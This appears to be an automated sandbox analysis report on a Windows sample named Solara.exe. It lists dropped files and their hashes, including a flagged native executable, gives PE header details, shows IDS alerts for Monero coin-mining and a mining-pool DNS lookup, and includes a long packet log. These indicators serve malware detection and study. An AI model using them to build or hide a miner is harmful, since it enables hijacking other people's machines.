                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4
                                                                                                  Entropy (8bit):2.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:qn:qn
                                                                                                  MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                  SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                  SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                  SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                  Malicious:false
                                                                                                  Preview:blat
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32768
                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                  Malicious:false
                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32768
                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                  Malicious:false
                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe
                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14544
                                                                                                  Entropy (8bit):6.2660301556221185
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.995071480993302
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: Solara.exe
File size: 14'390'272 bytes
MD5: cc6d7a6b17febe201b7f7d26ce944c08
SHA1: 231e8439c0facca7cc4b730bf950351d48e3a7c2
SHA256: b1883486b5e6da993af6deb6f4d0f524ccdc6317bdc32ed50dccd1799867a3bd
SHA512: c2abd5a8a59e09951df3d17b591442097cb2615a57abbef9afee9660dcd59ece483ca9a6ab4e83a622235eef4c75ef64dc2b32b58829cef8c485e1517e9ba652
SSDEEP: 393216:KsEANEX3gBGYVwwoE0VhUqE7SlO9h4m/a360m:KhIEX3kGN/XBEWs4EA60m
TLSH: 6DE6337007A4C5CFD7844BF98581BA78B878CAE5B822FAC57D2E75D8992134C2CD6E4C
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Hhg.................j...(......>.... ........@.. ....................................@................................
Icon Hash: f0e1e4f0d8e972c3
Entrypoint: 0x117883e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x676848DC [Sun Dec 22 17:14:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd787e8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd7a000 | 0x4259c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xdbe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xd76844 | 0xd76a00 | b86e10d7f696482688377d459d00c7b8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xd7a000 | 0x4259c | 0x42600 | 0b1fce832b0a653efc0e29865ab321e9 | False | 0.3729585981638418 | data | 5.623945089143449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xdbe000 | 0xc | 0x200 | 31c1452d083fe81a07085e801843b705 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd7a130 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144 | | | 0.3722519750273693
RT_GROUP_ICON | 0xdbc158 | 0x14 | data | | | 0.9
RT_VERSION | 0xdbc16c | 0x244 | data | | | 0.4706896551724138
RT_MANIFEST | 0xdbc3b0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-12T07:10:24.458989+0100 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.2.7 | 49857 | 80.240.16.67 | 443 | TCP
2025-01-12T07:10:50.120905+0100 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.7 | 62230 | 1.1.1.1 | 53 | UDP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 12, 2025 07:10:50.130175114 CET | 49857 | 443 | 192.168.2.7 | 80.240.16.67
Jan 12, 2025 07:10:50.130215883 CET | 443 | 49857 | 80.240.16.67 | 192.168.2.7
Jan 12, 2025 07:10:50.130271912 CET | 49857 | 443 | 192.168.2.7 | 80.240.16.67
Jan 12, 2025 07:10:50.130491972 CET | 49857 | 443 | 192.168.2.7 | 80.240.16.67
Jan 12, 2025 07:10:50.130508900 CET | 443 | 49857 | 80.240.16.67 | 192.168.2.7
Jan 12, 2025 07:10:50.819168091 CET | 443 | 49857 | 80.240.16.67 | 192.168.2.7
Jan 12, 2025 07:10:50.821005106 CET | 49857 | 443 | 192.168.2.7 | 80.240.16.67
Jan 12, 2025 07:10:50.821018934 CET | 443 | 49857 | 80.240.16.67 | 192.168.2.7
Jan 12, 2025 07:10:50.822875023 CET | 443 | 49857 | 80.240.16.67 | 192.168.2.7
Jan 12, 2025 07:10:50.822952032 CET | 49857 | 443 | 192.168.2.7 | 80.240.16.67
Jan 12, 2025 07:10:50.824537039 CET | 49857 | 443 | 192.168.2.7 | 80.240.16.67
Jan 12, 2025 07:10:50.824610949 CET | 443 | 49857 | 80.240.16.67 | 192.168.2.7
Jan 12, 2025 07:10:50.873631954 CET | 49857 | 443 | 192.168.2.7 | 80.240.16.67
Jan 12, 2025 07:10:50.873639107 CET | 443 | 49857 | 80.240.16.67 | 192.168.2.7
Jan 12, 2025 07:10:50.982975960 CET | 49857 | 443 | 192.168.2.7 | 80.240.16.67
Jan 12, 2025 07:10:51.143615961 CET | 443 | 49857 | 80.240.16.67 | 192.168.2.7
Jan 12, 2025 07:10:51.186113119 CET | 49857 | 443 | 192.168.2.7 | 80.240.16.67
Jan 12, 2025 07:11:01.103049040 CET | 443 | 49857 | 80.240.16.67 | 192.168.2.7
Jan 12, 2025 07:11:01.186180115 CET | 49857 | 443 | 192.168.2.7 | 80.240.16.67
Jan 12, 2025 07:11:09.416131973 CET | 443 | 49857 | 80.240.16.67 | 192.168.2.7
Jan 12, 2025 07:11:09.576869965 CET | 49857 | 443 | 192.168.2.7 | 80.240.16.67
Jan 12, 2025 07:11:17.868184090 CET | 49982 | 80 | 192.168.2.7 | 208.95.112.1
Jan 12, 2025 07:11:17.873063087 CET | 80 | 49982 | 208.95.112.1 | 192.168.2.7
Jan 12, 2025 07:11:17.873158932 CET | 49982 | 80 | 192.168.2.7 | 208.95.112.1
Jan 12, 2025 07:11:17.874192953 CET | 49982 | 80 | 192.168.2.7 | 208.95.112.1
Jan 12, 2025 07:11:17.879093885 CET | 80 | 49982 | 208.95.112.1 | 192.168.2.7
Jan 12, 2025 07:11:18.338527918 CET | 80 | 49982 | 208.95.112.1 | 192.168.2.7
Jan 12, 2025 07:11:18.351532936 CET | 49982 | 80 | 192.168.2.7 | 208.95.112.1
Jan 12, 2025 07:11:18.356682062 CET | 80 | 49982 | 208.95.112.1 | 192.168.2.7
Jan 12, 2025 07:11:18.360771894 CET | 49982 | 80 | 192.168.2.7 | 208.95.112.1
Jan 12, 2025 07:11:27.260097027 CET | 49983 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.260126114 CET | 443 | 49983 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:27.260210991 CET | 49983 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.261075020 CET | 49983 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.261089087 CET | 443 | 49983 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:27.742584944 CET | 443 | 49983 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:27.743201017 CET | 49983 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.743210077 CET | 443 | 49983 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:27.744371891 CET | 443 | 49983 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:27.744432926 CET | 49983 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.745337009 CET | 49983 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.745515108 CET | 443 | 49983 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:27.745695114 CET | 49983 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.745702982 CET | 443 | 49983 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:27.745809078 CET | 49983 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.787322998 CET | 443 | 49983 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:27.956113100 CET | 443 | 49983 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:27.956233978 CET | 443 | 49983 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:27.956285954 CET | 49983 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.957736015 CET | 49983 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.957751989 CET | 443 | 49983 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:27.959559917 CET | 49984 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.959599972 CET | 443 | 49984 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:27.959695101 CET | 49984 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.960196018 CET | 49984 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:27.960210085 CET | 443 | 49984 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:28.450489998 CET | 443 | 49984 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:28.450998068 CET | 49984 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:28.451016903 CET | 443 | 49984 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:28.452076912 CET | 443 | 49984 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:28.452145100 CET | 49984 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:28.453103065 CET | 49984 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:28.453176022 CET | 443 | 49984 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:28.453365088 CET | 49984 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:28.453372002 CET | 443 | 49984 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:28.453461885 CET | 49984 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:28.499322891 CET | 443 | 49984 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:28.660053968 CET | 443 | 49984 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:28.660201073 CET | 443 | 49984 | 162.159.134.233 | 192.168.2.7
Jan 12, 2025 07:11:28.660252094 CET | 49984 | 443 | 192.168.2.7 | 162.159.134.233
Jan 12, 2025 07:11:28.661653042 CET | 49984 | 443 | 192.168.2.7 | 162.159.134.233
                                                                                                  Jan 12, 2025 07:11:28.661672115 CET44349984162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.663947105 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:28.663992882 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.664063931 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:28.664592981 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:28.664608955 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.136555910 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.144351959 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.144366980 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.145423889 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.145495892 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.155828953 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.155941963 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.163055897 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.163074017 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.222625971 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.222687006 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.222847939 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.222884893 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223000050 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223030090 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223130941 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223207951 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223242998 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223499060 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223534107 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223707914 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223746061 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223759890 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223766088 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223906994 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223927021 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223954916 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223969936 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223978996 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.224106073 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.224153042 CET49985443192.168.2.7162.159.135.233
